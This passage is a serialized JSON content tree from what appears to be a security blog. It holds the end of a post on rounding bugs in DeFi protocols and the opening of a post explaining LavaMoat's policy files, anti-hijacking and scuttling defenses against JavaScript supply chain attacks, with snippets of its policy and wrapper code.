depositInterestFactor ",{"type":24,"tag":301,"props":53702,"children":53703},{"style":385},[53704],{"type":30,"value":1036},{"type":24,"tag":301,"props":53706,"children":53707},{"style":359},[53708],{"type":30,"value":53674},{"type":24,"tag":32,"props":53710,"children":53711},{},[53712],{"type":30,"value":53713},"We also want to note some general takeaways:",{"type":24,"tag":32,"props":53715,"children":53716},{},[53717,53719,53724],{"type":30,"value":53718},"Invariant testing is overhyped, but is quite applicable here. Instead of attempting to reason about effects after a state change, ",{"type":24,"tag":5422,"props":53720,"children":53721},{},[53722],{"type":30,"value":53723},"apply the state changes and check the invariant",{"type":30,"value":206},{"type":24,"tag":32,"props":53726,"children":53727},{},[53728],{"type":30,"value":53729},"From a protocol design perspective, users are withdrawing shares, not tokens. This is an important distinction. Your accounting logic should reason in terms of shares when possible.",{"type":24,"tag":32,"props":53731,"children":53732},{},[53733],{"type":30,"value":53734},"And finally, correct rounding behavior should still be accounted for, even if it doesn't seem impactful.",{"type":24,"tag":43,"props":53736,"children":53737},{"id":9652},[53738],{"type":30,"value":9655},{"type":24,"tag":32,"props":53740,"children":53741},{},[53742],{"type":30,"value":53743},"Rounding forces protocol developers to think carefully about dust. It's not always enough to round against the user. While initially this seems like a novel, scary attack vector, much of the impact can be mitigated operationally.",{"type":24,"tag":32,"props":53745,"children":53746},{},[53747],{"type":30,"value":53748},"As a final exercise to the reader: what is the correct rounding behavior during liquidations?",{"type":24,"tag":9672,"props":53750,"children":53751},{},[53752],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":53754},[53755,53756,53757,53761,53762,53763],{"id":35771,"depth":320,"text":35774},{"id":52677,"depth":320,"text":52680},{"id":52796,"depth":320,"text":52799,"children":53758},[53759,53760],{"id":52807,"depth":335,"text":52810},{"id":52845,"depth":335,"text":52848},{"id":53403,"depth":320,"text":53406},{"id":53468,"depth":320,"text":53471},{"id":9652,"depth":320,"text":9655},"content:blog:2024-01-18-rounding-bugs.md","blog/2024-01-18-rounding-bugs.md","blog/2024-01-18-rounding-bugs",{"_path":53768,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":53769,"description":53770,"author":53771,"image":53772,"date":53774,"isFeatured":16,"onBlogPage":16,"body":53775,"_type":9700,"_id":57248,"_source":9702,"_file":57249,"_stem":57250,"_extension":9705},"/blog/2024-06-10-supply-chain-attacks-a-new-era","Supply Chain Attacks: A New Era","Unpacking Lavamoat and how it fights supply chain attacks in Web3. We spill the beans on some sneaky bypasses, illustrating just how tricky it is to lock down JavaScript ecosystems.",[37957,37956],{"src":53773},"/posts/supply-chain-attacks-a-new-era/header.jpg","2024-06-10",{"type":21,"children":53776,"toc":57227},[53777,53781,53802,53807,53811,53816,53855,53861,53876,53894,53899,53904,53909,53922,54229,54255,54268,54273,54278,54292,54297,54310,54323,54554,54575,54610,54616,54621,54626,54840,54861,54867,54879,54969,54991,55027,55035,55053,55308,55334,55340,55354,55552,55571,55975,55988,55994,56013,56106,56111,56117,56130,56143,56229,56235,56247,56331,56343,56356,56362,56367,56381,56708,56713,56718,56724,56750,56805,56825,56878,56884,56889,56908,56919,57113,57119,57142,57148,57153,57166,57171,57176,57180,57185,57193,57223],{"type":24,"tag":43,"props":53778,"children":53779},{"id":25732},[53780],{"type":30,"value":25735},{"type":24,"tag":32,"props":53782,"children":53783},{},[53784,53791,53793,53800],{"type":24,"tag":188,"props":53785,"children":53788},{"href":53786,"rel":53787},"https://www.cloudflare.com/it-it/learning/security/what-is-a-supply-chain-attack/",[192],[53789],{"type":30,"value":53790},"Supply chain",{"type":30,"value":53792}," attacks are becoming ",{"type":24,"tag":188,"props":53794,"children":53797},{"href":53795,"rel":53796},"https://www.bleepingcomputer.com/news/security/ledger-dapp-supply-chain-attack-steals-600k-from-crypto-wallets/",[192],[53798],{"type":30,"value":53799},"increasingly popular in Web3",{"type":30,"value":53801},". In response, Lavamoat has emerged as a robust defense mechanism against supply chain attacks, offering sophisticated isolation and access control features. These help ensure that malicious dependencies cannot execute harmful code.",{"type":24,"tag":32,"props":53803,"children":53804},{},[53805],{"type":30,"value":53806},"In this article, we will explore how each component of Lavamoat works, and dive into the various bypasses we reported.",{"type":24,"tag":80,"props":53808,"children":53809},{"id":35771},[53810],{"type":30,"value":35774},{"type":24,"tag":32,"props":53812,"children":53813},{},[53814],{"type":30,"value":53815},"It is important to note that there are three different versions of LavaMoat:",{"type":24,"tag":6246,"props":53817,"children":53818},{},[53819,53831,53843],{"type":24,"tag":2659,"props":53820,"children":53821},{},[53822,53829],{"type":24,"tag":188,"props":53823,"children":53826},{"href":53824,"rel":53825},"https://github.com/LavaMoat/LavaMoat/tree/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/browserify",[192],[53827],{"type":30,"value":53828},"Lavamoat Browserify",{"type":30,"value":53830}," serves as a bundle packer. This helps organize and package JavaScript code for frontend deployment.",{"type":24,"tag":2659,"props":53832,"children":53833},{},[53834,53841],{"type":24,"tag":188,"props":53835,"children":53838},{"href":53836,"rel":53837},"https://github.com/LavaMoat/LavaMoat/tree/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/node",[192],[53839],{"type":30,"value":53840},"NodeJS Lavamoat",{"type":30,"value":53842}," is a variant of Lavamoat tailored specifically for Node.js environments.",{"type":24,"tag":2659,"props":53844,"children":53845},{},[53846,53853],{"type":24,"tag":188,"props":53847,"children":53850},{"href":53848,"rel":53849},"https://github.com/LavaMoat/LavaMoat/tree/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/allow-scripts",[192],[53851],{"type":30,"value":53852},"Lavamoat allow-scripts",{"type":30,"value":53854}," are used to prevent malicious code execution on lifecycle scripts.",{"type":24,"tag":80,"props":53856,"children":53858},{"id":53857},"lavamoats-security-features",[53859],{"type":30,"value":53860},"Lavamoat's Security Features",{"type":24,"tag":32,"props":53862,"children":53863},{},[53864,53866,53874],{"type":30,"value":53865},"The three most important features of Lavamoat",{"type":24,"tag":22262,"props":53867,"children":53868},{},[53869],{"type":24,"tag":188,"props":53870,"children":53872},{"href":36380,"ariaDescribedBy":53871,"dataFootnoteRef":7,"id":36382},[22269],[53873],{"type":30,"value":546},{"type":30,"value":53875}," are:",{"type":24,"tag":2655,"props":53877,"children":53878},{},[53879,53884,53889],{"type":24,"tag":2659,"props":53880,"children":53881},{},[53882],{"type":30,"value":53883},"Policy Files",{"type":24,"tag":2659,"props":53885,"children":53886},{},[53887],{"type":30,"value":53888},"NPM Anti Hijacking",{"type":24,"tag":2659,"props":53890,"children":53891},{},[53892],{"type":30,"value":53893},"Scuttling",{"type":24,"tag":32,"props":53895,"children":53896},{},[53897],{"type":30,"value":53898},"Let's go over them one by one.",{"type":24,"tag":270,"props":53900,"children":53902},{"id":53901},"policy-files",[53903],{"type":30,"value":53883},{"type":24,"tag":32,"props":53905,"children":53906},{},[53907],{"type":30,"value":53908},"Policy files are one important feature of Lavamoat, as they limit access to the potentially dangeorus platform API and Globals.",{"type":24,"tag":32,"props":53910,"children":53911},{},[53912,53914,53921],{"type":30,"value":53913},"For example, take the ",{"type":24,"tag":188,"props":53915,"children":53918},{"href":53916,"rel":53917},"https://github.com/MetaMask/snaps/blob/c5ddd897734f900f459c66a91f3334e76903825c/packages/snaps-execution-environments/lavamoat/browserify/iframe/policy.json#L77",[192],[53919],{"type":30,"value":53920},"Metamask Snap policy file",{"type":30,"value":1679},{"type":24,"tag":291,"props":53923,"children":53925},{"className":38119,"code":53924,"language":38121,"meta":7,"style":7}," \"@metamask/providers\": {\n \"globals\": {\n \"Event\": true,\n \"addEventListener\": true,\n \"chrome.runtime.connect\": true,\n \"console\": true,\n \"dispatchEvent\": true,\n \"document.createElement\": true,\n \"document.readyState\": true,\n \"ethereum\": \"write\",\n \"location.hostname\": true,\n \"removeEventListener\": true,\n \"web3\": true\n },\n \"packages\": {\n \"@metamask/object-multiplex\": true,\n \"@metamask/providers>@metamask/safe-event-emitter\": true\n",[53926],{"type":24,"tag":145,"props":53927,"children":53928},{"__ignoreMap":7},[53929,53941,53956,53976,53995,54015,54035,54055,54075,54095,54116,54136,54155,54171,54178,54193,54213],{"type":24,"tag":301,"props":53930,"children":53931},{"class":303,"line":304},[53932,53937],{"type":24,"tag":301,"props":53933,"children":53934},{"style":329},[53935],{"type":30,"value":53936}," \"@metamask/providers\"",{"type":24,"tag":301,"props":53938,"children":53939},{"style":359},[53940],{"type":30,"value":6726},{"type":24,"tag":301,"props":53942,"children":53943},{"class":303,"line":320},[53944,53948,53952],{"type":24,"tag":301,"props":53945,"children":53946},{"style":329},[53947],{"type":30,"value":43771},{"type":24,"tag":301,"props":53949,"children":53950},{"style":369},[53951],{"type":30,"value":1679},{"type":24,"tag":301,"props":53953,"children":53954},{"style":359},[53955],{"type":30,"value":3035},{"type":24,"tag":301,"props":53957,"children":53958},{"class":303,"line":335},[53959,53964,53968,53972],{"type":24,"tag":301,"props":53960,"children":53961},{"style":329},[53962],{"type":30,"value":53963}," \"Event\"",{"type":24,"tag":301,"props":53965,"children":53966},{"style":369},[53967],{"type":30,"value":1679},{"type":24,"tag":301,"props":53969,"children":53970},{"style":348},[53971],{"type":30,"value":3440},{"type":24,"tag":301,"props":53973,"children":53974},{"style":359},[53975],{"type":30,"value":1729},{"type":24,"tag":301,"props":53977,"children":53978},{"class":303,"line":344},[53979,53983,53987,53991],{"type":24,"tag":301,"props":53980,"children":53981},{"style":329},[53982],{"type":30,"value":43823},{"type":24,"tag":301,"props":53984,"children":53985},{"style":369},[53986],{"type":30,"value":1679},{"type":24,"tag":301,"props":53988,"children":53989},{"style":348},[53990],{"type":30,"value":3440},{"type":24,"tag":301,"props":53992,"children":53993},{"style":359},[53994],{"type":30,"value":1729},{"type":24,"tag":301,"props":53996,"children":53997},{"class":303,"line":401},[53998,54003,54007,54011],{"type":24,"tag":301,"props":53999,"children":54000},{"style":329},[54001],{"type":30,"value":54002}," \"chrome.runtime.connect\"",{"type":24,"tag":301,"props":54004,"children":54005},{"style":369},[54006],{"type":30,"value":1679},{"type":24,"tag":301,"props":54008,"children":54009},{"style":348},[54010],{"type":30,"value":3440},{"type":24,"tag":301,"props":54012,"children":54013},{"style":359},[54014],{"type":30,"value":1729},{"type":24,"tag":301,"props":54016,"children":54017},{"class":303,"line":415},[54018,54023,54027,54031],{"type":24,"tag":301,"props":54019,"children":54020},{"style":329},[54021],{"type":30,"value":54022}," \"console\"",{"type":24,"tag":301,"props":54024,"children":54025},{"style":369},[54026],{"type":30,"value":1679},{"type":24,"tag":301,"props":54028,"children":54029},{"style":348},[54030],{"type":30,"value":3440},{"type":24,"tag":301,"props":54032,"children":54033},{"style":359},[54034],{"type":30,"value":1729},{"type":24,"tag":301,"props":54036,"children":54037},{"class":303,"line":439},[54038,54043,54047,54051],{"type":24,"tag":301,"props":54039,"children":54040},{"style":329},[54041],{"type":30,"value":54042}," \"dispatchEvent\"",{"type":24,"tag":301,"props":54044,"children":54045},{"style":369},[54046],{"type":30,"value":1679},{"type":24,"tag":301,"props":54048,"children":54049},{"style":348},[54050],{"type":30,"value":3440},{"type":24,"tag":301,"props":54052,"children":54053},{"style":359},[54054],{"type":30,"value":1729},{"type":24,"tag":301,"props":54056,"children":54057},{"class":303,"line":447},[54058,54063,54067,54071],{"type":24,"tag":301,"props":54059,"children":54060},{"style":329},[54061],{"type":30,"value":54062}," \"document.createElement\"",{"type":24,"tag":301,"props":54064,"children":54065},{"style":369},[54066],{"type":30,"value":1679},{"type":24,"tag":301,"props":54068,"children":54069},{"style":348},[54070],{"type":30,"value":3440},{"type":24,"tag":301,"props":54072,"children":54073},{"style":359},[54074],{"type":30,"value":1729},{"type":24,"tag":301,"props":54076,"children":54077},{"class":303,"line":476},[54078,54083,54087,54091],{"type":24,"tag":301,"props":54079,"children":54080},{"style":329},[54081],{"type":30,"value":54082}," \"document.readyState\"",{"type":24,"tag":301,"props":54084,"children":54085},{"style":369},[54086],{"type":30,"value":1679},{"type":24,"tag":301,"props":54088,"children":54089},{"style":348},[54090],{"type":30,"value":3440},{"type":24,"tag":301,"props":54092,"children":54093},{"style":359},[54094],{"type":30,"value":1729},{"type":24,"tag":301,"props":54096,"children":54097},{"class":303,"line":495},[54098,54103,54107,54112],{"type":24,"tag":301,"props":54099,"children":54100},{"style":329},[54101],{"type":30,"value":54102}," \"ethereum\"",{"type":24,"tag":301,"props":54104,"children":54105},{"style":369},[54106],{"type":30,"value":1679},{"type":24,"tag":301,"props":54108,"children":54109},{"style":329},[54110],{"type":30,"value":54111}," \"write\"",{"type":24,"tag":301,"props":54113,"children":54114},{"style":359},[54115],{"type":30,"value":1729},{"type":24,"tag":301,"props":54117,"children":54118},{"class":303,"line":504},[54119,54124,54128,54132],{"type":24,"tag":301,"props":54120,"children":54121},{"style":329},[54122],{"type":30,"value":54123}," \"location.hostname\"",{"type":24,"tag":301,"props":54125,"children":54126},{"style":369},[54127],{"type":30,"value":1679},{"type":24,"tag":301,"props":54129,"children":54130},{"style":348},[54131],{"type":30,"value":3440},{"type":24,"tag":301,"props":54133,"children":54134},{"style":359},[54135],{"type":30,"value":1729},{"type":24,"tag":301,"props":54137,"children":54138},{"class":303,"line":512},[54139,54143,54147,54151],{"type":24,"tag":301,"props":54140,"children":54141},{"style":329},[54142],{"type":30,"value":43923},{"type":24,"tag":301,"props":54144,"children":54145},{"style":369},[54146],{"type":30,"value":1679},{"type":24,"tag":301,"props":54148,"children":54149},{"style":348},[54150],{"type":30,"value":3440},{"type":24,"tag":301,"props":54152,"children":54153},{"style":359},[54154],{"type":30,"value":1729},{"type":24,"tag":301,"props":54156,"children":54157},{"class":303,"line":592},[54158,54163,54167],{"type":24,"tag":301,"props":54159,"children":54160},{"style":329},[54161],{"type":30,"value":54162}," \"web3\"",{"type":24,"tag":301,"props":54164,"children":54165},{"style":369},[54166],{"type":30,"value":1679},{"type":24,"tag":301,"props":54168,"children":54169},{"style":348},[54170],{"type":30,"value":53285},{"type":24,"tag":301,"props":54172,"children":54173},{"class":303,"line":619},[54174],{"type":24,"tag":301,"props":54175,"children":54176},{"style":359},[54177],{"type":30,"value":6903},{"type":24,"tag":301,"props":54179,"children":54180},{"class":303,"line":635},[54181,54185,54189],{"type":24,"tag":301,"props":54182,"children":54183},{"style":329},[54184],{"type":30,"value":43947},{"type":24,"tag":301,"props":54186,"children":54187},{"style":369},[54188],{"type":30,"value":1679},{"type":24,"tag":301,"props":54190,"children":54191},{"style":359},[54192],{"type":30,"value":3035},{"type":24,"tag":301,"props":54194,"children":54195},{"class":303,"line":643},[54196,54201,54205,54209],{"type":24,"tag":301,"props":54197,"children":54198},{"style":329},[54199],{"type":30,"value":54200}," \"@metamask/object-multiplex\"",{"type":24,"tag":301,"props":54202,"children":54203},{"style":369},[54204],{"type":30,"value":1679},{"type":24,"tag":301,"props":54206,"children":54207},{"style":348},[54208],{"type":30,"value":3440},{"type":24,"tag":301,"props":54210,"children":54211},{"style":359},[54212],{"type":30,"value":1729},{"type":24,"tag":301,"props":54214,"children":54215},{"class":303,"line":652},[54216,54221,54225],{"type":24,"tag":301,"props":54217,"children":54218},{"style":329},[54219],{"type":30,"value":54220}," \"@metamask/providers>@metamask/safe-event-emitter\"",{"type":24,"tag":301,"props":54222,"children":54223},{"style":369},[54224],{"type":30,"value":1679},{"type":24,"tag":301,"props":54226,"children":54227},{"style":348},[54228],{"type":30,"value":53285},{"type":24,"tag":32,"props":54230,"children":54231},{},[54232,54233,54238,54240,54245,54247,54253],{"type":30,"value":8079},{"type":24,"tag":145,"props":54234,"children":54236},{"className":54235},[],[54237],{"type":30,"value":44012},{"type":30,"value":54239}," section in a LavaMoat policy specifies which global variables and properties a module can access, setting permissions for its global scope interactions. Similarly, the ",{"type":24,"tag":145,"props":54241,"children":54243},{"className":54242},[],[54244],{"type":30,"value":44020},{"type":30,"value":54246}," section outlines the module's dependencies and the permissions or trust relationships with those dependencies. This defines how ",{"type":24,"tag":145,"props":54248,"children":54250},{"className":54249},[],[54251],{"type":30,"value":54252},"@metamask/providers",{"type":30,"value":54254}," interacts with other packages.",{"type":24,"tag":32,"props":54256,"children":54257},{},[54258,54260,54266],{"type":30,"value":54259},"To enforce these policies, LavaMoat uses ",{"type":24,"tag":145,"props":54261,"children":54263},{"className":54262},[],[54264],{"type":30,"value":54265},"lavapack",{"type":30,"value":54267},", a custom webpack that wraps ever dependency and applies the specified rules independently.",{"type":24,"tag":270,"props":54269,"children":54271},{"id":54270},"npm-anti-hijacking",[54272],{"type":30,"value":53888},{"type":24,"tag":32,"props":54274,"children":54275},{},[54276],{"type":30,"value":54277},"One important note is that Lavamoat can't rely solely on the names of the packages as they are published on NPM. Otherwise, a malicious actor could create a package with the same name as a popular, trusted package.",{"type":24,"tag":32,"props":54279,"children":54280},{},[54281,54283,54290],{"type":30,"value":54282},"Instead, Lavamoat looks at how each package is connected by ",{"type":24,"tag":188,"props":54284,"children":54287},{"href":54285,"rel":54286},"https://github.com/LavaMoat/LavaMoat/blob/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/core/src/walk.js#L22",[192],[54288],{"type":30,"value":54289},"walking the modules",{"type":30,"value":54291}," in a project's dependency tree, thus generating a unique name for each package.",{"type":24,"tag":270,"props":54293,"children":54295},{"id":54294},"scuttling",[54296],{"type":30,"value":53893},{"type":24,"tag":32,"props":54298,"children":54299},{},[54300,54302,54308],{"type":30,"value":54301},"Scuttling is an optional feature that adds an extra layer of protection. Even if the real ",{"type":24,"tag":145,"props":54303,"children":54305},{"className":54304},[],[54306],{"type":30,"value":54307},"GlobalThis",{"type":30,"value":54309}," object is leaked by an attacker or accessed through a malicious package manager, scuttling removes sensitive APIs, preventing malicious requests from being executed.",{"type":24,"tag":32,"props":54311,"children":54312},{},[54313,54315,54321],{"type":30,"value":54314},"For example, ",{"type":24,"tag":188,"props":54316,"children":54319},{"href":54317,"rel":54318},"https://github.com/LavaMoat/LavaMoat/blob/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/core/src/scuttle.js#L57",[192],[54320],{"type":30,"value":5193},{"type":30,"value":54322}," we see how Lavamoat checks if the feature is enabled after the root package compartment is created:",{"type":24,"tag":291,"props":54324,"children":54326},{"className":38119,"code":54325,"language":38121,"meta":7,"style":7}," if (scuttleOpts.enabled) {\n if (!Array.isArray(scuttleOpts.exceptions)) {\n throw new Error(`LavaMoat - scuttleGlobalThis.exceptions must be an array, got \"${typeof scuttleOpts.exceptions}\"`)\n }\n scuttleOpts.scuttlerFunc(globalRef, realm => performScuttleGlobalThis(realm, scuttleOpts.exceptions))\n }\n",[54327],{"type":24,"tag":145,"props":54328,"children":54329},{"__ignoreMap":7},[54330,54359,54409,54468,54475,54547],{"type":24,"tag":301,"props":54331,"children":54332},{"class":303,"line":304},[54333,54337,54341,54346,54350,54355],{"type":24,"tag":301,"props":54334,"children":54335},{"style":308},[54336],{"type":30,"value":453},{"type":24,"tag":301,"props":54338,"children":54339},{"style":359},[54340],{"type":30,"value":873},{"type":24,"tag":301,"props":54342,"children":54343},{"style":369},[54344],{"type":30,"value":54345},"scuttleOpts",{"type":24,"tag":301,"props":54347,"children":54348},{"style":359},[54349],{"type":30,"value":206},{"type":24,"tag":301,"props":54351,"children":54352},{"style":369},[54353],{"type":30,"value":54354},"enabled",{"type":24,"tag":301,"props":54356,"children":54357},{"style":359},[54358],{"type":30,"value":398},{"type":24,"tag":301,"props":54360,"children":54361},{"class":303,"line":320},[54362,54366,54370,54374,54379,54383,54388,54392,54396,54400,54405],{"type":24,"tag":301,"props":54363,"children":54364},{"style":308},[54365],{"type":30,"value":2476},{"type":24,"tag":301,"props":54367,"children":54368},{"style":359},[54369],{"type":30,"value":873},{"type":24,"tag":301,"props":54371,"children":54372},{"style":385},[54373],{"type":30,"value":2485},{"type":24,"tag":301,"props":54375,"children":54376},{"style":369},[54377],{"type":30,"value":54378},"Array",{"type":24,"tag":301,"props":54380,"children":54381},{"style":359},[54382],{"type":30,"value":206},{"type":24,"tag":301,"props":54384,"children":54385},{"style":314},[54386],{"type":30,"value":54387},"isArray",{"type":24,"tag":301,"props":54389,"children":54390},{"style":359},[54391],{"type":30,"value":362},{"type":24,"tag":301,"props":54393,"children":54394},{"style":369},[54395],{"type":30,"value":54345},{"type":24,"tag":301,"props":54397,"children":54398},{"style":359},[54399],{"type":30,"value":206},{"type":24,"tag":301,"props":54401,"children":54402},{"style":369},[54403],{"type":30,"value":54404},"exceptions",{"type":24,"tag":301,"props":54406,"children":54407},{"style":359},[54408],{"type":30,"value":41941},{"type":24,"tag":301,"props":54410,"children":54411},{"class":303,"line":335},[54412,54417,54421,54425,54429,54434,54438,54442,54447,54451,54455,54459,54464],{"type":24,"tag":301,"props":54413,"children":54414},{"style":308},[54415],{"type":30,"value":54416}," throw",{"type":24,"tag":301,"props":54418,"children":54419},{"style":348},[54420],{"type":30,"value":38685},{"type":24,"tag":301,"props":54422,"children":54423},{"style":314},[54424],{"type":30,"value":47019},{"type":24,"tag":301,"props":54426,"children":54427},{"style":359},[54428],{"type":30,"value":362},{"type":24,"tag":301,"props":54430,"children":54431},{"style":329},[54432],{"type":30,"value":54433},"`LavaMoat - scuttleGlobalThis.exceptions must be an array, got \"",{"type":24,"tag":301,"props":54435,"children":54436},{"style":348},[54437],{"type":30,"value":40857},{"type":24,"tag":301,"props":54439,"children":54440},{"style":348},[54441],{"type":30,"value":38158},{"type":24,"tag":301,"props":54443,"children":54444},{"style":369},[54445],{"type":30,"value":54446}," scuttleOpts",{"type":24,"tag":301,"props":54448,"children":54449},{"style":385},[54450],{"type":30,"value":206},{"type":24,"tag":301,"props":54452,"children":54453},{"style":369},[54454],{"type":30,"value":54404},{"type":24,"tag":301,"props":54456,"children":54457},{"style":348},[54458],{"type":30,"value":40889},{"type":24,"tag":301,"props":54460,"children":54461},{"style":329},[54462],{"type":30,"value":54463},"\"`",{"type":24,"tag":301,"props":54465,"children":54466},{"style":359},[54467],{"type":30,"value":791},{"type":24,"tag":301,"props":54469,"children":54470},{"class":303,"line":344},[54471],{"type":24,"tag":301,"props":54472,"children":54473},{"style":359},[54474],{"type":30,"value":19459},{"type":24,"tag":301,"props":54476,"children":54477},{"class":303,"line":401},[54478,54483,54487,54492,54496,54501,54505,54510,54514,54519,54523,54527,54531,54535,54539,54543],{"type":24,"tag":301,"props":54479,"children":54480},{"style":369},[54481],{"type":30,"value":54482}," scuttleOpts",{"type":24,"tag":301,"props":54484,"children":54485},{"style":359},[54486],{"type":30,"value":206},{"type":24,"tag":301,"props":54488,"children":54489},{"style":314},[54490],{"type":30,"value":54491},"scuttlerFunc",{"type":24,"tag":301,"props":54493,"children":54494},{"style":359},[54495],{"type":30,"value":362},{"type":24,"tag":301,"props":54497,"children":54498},{"style":369},[54499],{"type":30,"value":54500},"globalRef",{"type":24,"tag":301,"props":54502,"children":54503},{"style":359},[54504],{"type":30,"value":377},{"type":24,"tag":301,"props":54506,"children":54507},{"style":369},[54508],{"type":30,"value":54509},"realm",{"type":24,"tag":301,"props":54511,"children":54512},{"style":348},[54513],{"type":30,"value":34508},{"type":24,"tag":301,"props":54515,"children":54516},{"style":314},[54517],{"type":30,"value":54518}," performScuttleGlobalThis",{"type":24,"tag":301,"props":54520,"children":54521},{"style":359},[54522],{"type":30,"value":362},{"type":24,"tag":301,"props":54524,"children":54525},{"style":369},[54526],{"type":30,"value":54509},{"type":24,"tag":301,"props":54528,"children":54529},{"style":359},[54530],{"type":30,"value":377},{"type":24,"tag":301,"props":54532,"children":54533},{"style":369},[54534],{"type":30,"value":54345},{"type":24,"tag":301,"props":54536,"children":54537},{"style":359},[54538],{"type":30,"value":206},{"type":24,"tag":301,"props":54540,"children":54541},{"style":369},[54542],{"type":30,"value":54404},{"type":24,"tag":301,"props":54544,"children":54545},{"style":359},[54546],{"type":30,"value":9381},{"type":24,"tag":301,"props":54548,"children":54549},{"class":303,"line":415},[54550],{"type":24,"tag":301,"props":54551,"children":54552},{"style":359},[54553],{"type":30,"value":501},{"type":24,"tag":32,"props":54555,"children":54556},{},[54557,54559,54565,54567,54573],{"type":30,"value":54558},"Subsequently, the code defines a ",{"type":24,"tag":188,"props":54560,"children":54563},{"href":54561,"rel":54562},"https://github.com/LavaMoat/LavaMoat/blob/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/core/src/scuttle.js#L74",[192],[54564],{"type":30,"value":3205},{"type":30,"value":54566}," called ",{"type":24,"tag":145,"props":54568,"children":54570},{"className":54569},[],[54571],{"type":30,"value":54572},"generateScuttleOpts",{"type":30,"value":54574}," that creates and returns an options object.",{"type":24,"tag":32,"props":54576,"children":54577},{},[54578,54580,54586,54587,54593,54595,54600,54602,54608],{"type":30,"value":54579},"Finally, the ",{"type":24,"tag":145,"props":54581,"children":54583},{"className":54582},[],[54584],{"type":30,"value":54585},"performScuttleGlobalThis",{"type":30,"value":13277},{"type":24,"tag":188,"props":54588,"children":54591},{"href":54589,"rel":54590},"https://github.com/LavaMoat/LavaMoat/blob/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/core/src/scuttle.js#L125",[192],[54592],{"type":30,"value":3205},{"type":30,"value":54594}," modifies the properties of the global object (",{"type":24,"tag":145,"props":54596,"children":54598},{"className":54597},[],[54599],{"type":30,"value":54500},{"type":30,"value":54601},"). It starts by creating an array ",{"type":24,"tag":145,"props":54603,"children":54605},{"className":54604},[],[54606],{"type":30,"value":54607},"props",{"type":30,"value":54609},", containing the names of all properties in the prototype chain of globalRef. Then, an empty object is then created to serve as a proxy for scuttled properties. The function then iterates over each property, making changes to the global window object based on the provided configuration.",{"type":24,"tag":43,"props":54611,"children":54613},{"id":54612},"hacking-webpacks",[54614],{"type":30,"value":54615},"Hacking Webpacks",{"type":24,"tag":32,"props":54617,"children":54618},{},[54619],{"type":30,"value":54620},"Now let's get to the fun stuff.",{"type":24,"tag":32,"props":54622,"children":54623},{},[54624],{"type":30,"value":54625},"Webpack is used to bundle all modules and packages into a single file. It inserts all the code of these modules into the bundle file. Checking Lavapack source code, we can see how this actually happens.",{"type":24,"tag":291,"props":54627,"children":54629},{"className":38119,"code":54628,"language":38121,"meta":7,"style":7}," const filename = encodeURI(String(moduleData.file))\n let moduleWrapperSource\n if (bundleWithPrecompiledModules) {\n moduleWrapperSource = `function(){\n with (this.scopeTerminator) {\n with (this.globalThis) {\n return function() {\n 'use strict';\n // source: ${filename}\n return function (require, module, exports) {\n __MODULE_CONTENT__\n };\n };\n }\n }\n }`\n",[54630],{"type":24,"tag":145,"props":54631,"children":54632},{"__ignoreMap":7},[54633,54685,54697,54717,54734,54742,54750,54758,54766,54787,54795,54803,54811,54818,54825,54832],{"type":24,"tag":301,"props":54634,"children":54635},{"class":303,"line":304},[54636,54640,54645,54649,54654,54658,54663,54667,54672,54676,54681],{"type":24,"tag":301,"props":54637,"children":54638},{"style":348},[54639],{"type":30,"value":42931},{"type":24,"tag":301,"props":54641,"children":54642},{"style":369},[54643],{"type":30,"value":54644}," filename",{"type":24,"tag":301,"props":54646,"children":54647},{"style":385},[54648],{"type":30,"value":2537},{"type":24,"tag":301,"props":54650,"children":54651},{"style":314},[54652],{"type":30,"value":54653}," encodeURI",{"type":24,"tag":301,"props":54655,"children":54656},{"style":359},[54657],{"type":30,"value":362},{"type":24,"tag":301,"props":54659,"children":54660},{"style":314},[54661],{"type":30,"value":54662},"String",{"type":24,"tag":301,"props":54664,"children":54665},{"style":359},[54666],{"type":30,"value":362},{"type":24,"tag":301,"props":54668,"children":54669},{"style":369},[54670],{"type":30,"value":54671},"moduleData",{"type":24,"tag":301,"props":54673,"children":54674},{"style":359},[54675],{"type":30,"value":206},{"type":24,"tag":301,"props":54677,"children":54678},{"style":369},[54679],{"type":30,"value":54680},"file",{"type":24,"tag":301,"props":54682,"children":54683},{"style":359},[54684],{"type":30,"value":9381},{"type":24,"tag":301,"props":54686,"children":54687},{"class":303,"line":320},[54688,54692],{"type":24,"tag":301,"props":54689,"children":54690},{"style":348},[54691],{"type":30,"value":14671},{"type":24,"tag":301,"props":54693,"children":54694},{"style":369},[54695],{"type":30,"value":54696}," moduleWrapperSource\n",{"type":24,"tag":301,"props":54698,"children":54699},{"class":303,"line":335},[54700,54704,54708,54713],{"type":24,"tag":301,"props":54701,"children":54702},{"style":308},[54703],{"type":30,"value":38149},{"type":24,"tag":301,"props":54705,"children":54706},{"style":359},[54707],{"type":30,"value":873},{"type":24,"tag":301,"props":54709,"children":54710},{"style":369},[54711],{"type":30,"value":54712},"bundleWithPrecompiledModules",{"type":24,"tag":301,"props":54714,"children":54715},{"style":359},[54716],{"type":30,"value":398},{"type":24,"tag":301,"props":54718,"children":54719},{"class":303,"line":344},[54720,54725,54729],{"type":24,"tag":301,"props":54721,"children":54722},{"style":369},[54723],{"type":30,"value":54724}," moduleWrapperSource",{"type":24,"tag":301,"props":54726,"children":54727},{"style":385},[54728],{"type":30,"value":2537},{"type":24,"tag":301,"props":54730,"children":54731},{"style":329},[54732],{"type":30,"value":54733}," `function(){\n",{"type":24,"tag":301,"props":54735,"children":54736},{"class":303,"line":401},[54737],{"type":24,"tag":301,"props":54738,"children":54739},{"style":329},[54740],{"type":30,"value":54741}," with (this.scopeTerminator) {\n",{"type":24,"tag":301,"props":54743,"children":54744},{"class":303,"line":415},[54745],{"type":24,"tag":301,"props":54746,"children":54747},{"style":329},[54748],{"type":30,"value":54749}," with (this.globalThis) {\n",{"type":24,"tag":301,"props":54751,"children":54752},{"class":303,"line":439},[54753],{"type":24,"tag":301,"props":54754,"children":54755},{"style":329},[54756],{"type":30,"value":54757}," return function() 